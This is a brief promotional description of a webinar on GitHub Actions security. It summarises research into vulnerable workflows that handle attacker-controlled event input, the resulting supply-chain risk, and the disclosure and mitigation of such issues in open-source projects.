GitHub Actions is an increasingly popular DevOps tool mainly due to its rich marketplace and ease-of-use.
As part of our research of the GitHub Actions security landscape, we discovered that in writing a perfectly secure GitHub Actions workflow, several pitfalls could cause severe security consequences. For example, many developers would use event input data to improve their workflow process. However, this data could be controlled by an attacker, and potentially compromise the build process. Unless the developers deeply understand GitHub best-practices documents, these workflows are likely to have mistakes. Such mistakes are costly - and could create supply-chain risk to the application.
During the webinar, we discuss how we found and disclosed vulnerable workflows in several popular open-source tools, delved into GitHub Actions architecture to understand the possible consequences of these vulnerabilities, and present what could be the mitigations for such issues.